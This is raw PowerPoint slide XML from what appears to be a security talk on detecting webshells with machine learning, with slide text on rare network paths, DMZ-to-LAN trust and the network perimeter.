        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1559705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Model Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2144394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548161" y="1207166"/>
            <a:ext cx="285750" cy="22860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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1792065" y="1402290"/>
            <a:ext cx="752501" cy="10578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urved Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1477974" y="1514323"/>
            <a:ext cx="1257185" cy="1033115"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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016101" y="2894782"/>
            <a:ext cx="645246" cy="44859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905250" y="3424200"/>
            <a:ext cx="1276350" cy="334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905250" y="3468887"/>
            <a:ext cx="2719388" cy="2577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a:endCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3318403" y="-163025"/>
            <a:ext cx="2102732" cy="5071715"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="lgDashDot"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="desktop-black-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859" y="3548096"/>
            <a:ext cx="471536" cy="453089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15"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138656"/>
            <a:ext cx="447782" cy="409440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545793" y="2209564"/>
            <a:ext cx="541162" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" b="1" dirty="0"/>
              <a:t>Webshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="datacenter-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124" y="2424167"/>
            <a:ext cx="336154" cy="470615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358702" y="2811829"/>
            <a:ext cx="975575" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" b="1" dirty="0"/>
              <a:t>DMZ to LAN Trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139954" y="3282533"/>
            <a:ext cx="138542" cy="196197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="68569" tIns="34285" rIns="68569" bIns="34285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="611419"/>
            <a:endParaRPr lang="en-US" sz="825" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="datacenters-black-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5655" y="3225366"/>
            <a:ext cx="521175" cy="397666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Beyond the Indicator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14659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2400" dirty="0"/>
              <a:t>How do we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Detect W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>ebshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Global Stats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359627" y="980199"/>
            <a:ext cx="4931492" cy="3557179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anomalies on rare paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U-&gt;S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>U !! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U-&gt;U (LAN to LAN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S-&gt;S (DMZ to LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2442978" y="3883596"/>
            <a:ext cx="729579" cy="3746"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="desktop-black-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443" y="3625193"/>
            <a:ext cx="471536" cy="453089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971442" y="4149561"/>
            <a:ext cx="467424" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>Desktop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264433" y="4149561"/>
            <a:ext cx="390479" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="datacenter-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4433" y="3607668"/>
            <a:ext cx="336154" cy="470615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28" descr="desktop-black-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408" y="3580453"/>
            <a:ext cx="471536" cy="453089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4985407" y="4104820"/>
            <a:ext cx="467424" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>Desktop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5575432" y="3876105"/>
            <a:ext cx="617630" cy="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35" descr="lap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376" y="3580453"/>
            <a:ext cx="447782" cy="409440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423543" y="4077607"/>
            <a:ext cx="403303" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>Laptop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5937860" y="2235267"/>
            <a:ext cx="729579" cy="3746"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38" descr="desktop-black-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224" y="2012468"/>
            <a:ext cx="471536" cy="453089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860223" y="2565677"/>
            <a:ext cx="578030" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>LAN Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323416" y="2561236"/>
            <a:ext cx="648562" cy="165904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="38570" tIns="19285" rIns="38570" bIns="19285" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="825" dirty="0"/>
              <a:t>DMZ Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41" descr="datacenter-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578" y="1985690"/>
            <a:ext cx="336154" cy="470615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18943244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Seeing the Analytic In Action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="DPR_radiu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048868" y="494012"/>
            <a:ext cx="2995478" cy="5118955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38336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3.png" descr="Screen Shot 2014-07-07 at 11.48.16 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="11620"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059119" y="1844441"/>
            <a:ext cx="5326839" cy="2733988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seeing the Analytic In Action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="825018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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seeing the Analytic In Action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359627" y="980199"/>
            <a:ext cx="4931492" cy="3557179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0"/>
              <a:t>Once identity resolution/learning process is complete we create new anomalies based on new paths/actions that are rare for a particular population </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0" smtClean="0"/>
              <a:t>profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="image13.png" descr="Screen Shot 2014-07-07 at 11.48.16 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="11620"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761427" y="1874777"/>
            <a:ext cx="5624531" cy="2703651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="image14.png" descr="Screen Shot 2014-06-30 at 6.43.01 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="3135" t="31713" r="84371" b="54345"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6058459" y="3654999"/>
            <a:ext cx="342903" cy="315974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="image14.png" descr="Screen Shot 2014-06-30 at 6.43.01 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="26989" t="23208" r="48156" b="11287"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6011628" y="3909088"/>
            <a:ext cx="1030988" cy="1049667"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6002288" y="3597850"/>
            <a:ext cx="424000" cy="3731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a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:endParaRPr sz="1050"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6002287" y="3784410"/>
            <a:ext cx="93899" cy="86561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sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364194" y="3652491"/>
            <a:ext cx="687761" cy="59636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sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Left Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7856309">
            <a:off x="6676621" y="3551076"/>
            <a:ext cx="379373" cy="458535"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="11429" cap="flat">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="25400" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="4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342900" latinLnBrk="1" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670055" y="3153791"/>
            <a:ext cx="1274067" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lightweight Webshell in the DMZ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1929117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3600" b="1" dirty="0"/>
              <a:t>The Perimeter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>network perimeter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> is the boundary between the private and locally managed-and-owned side of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> and the public and usually provider-managed side of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>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How do we detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Webshells</a:t>
            </a:r>
            <a:r>
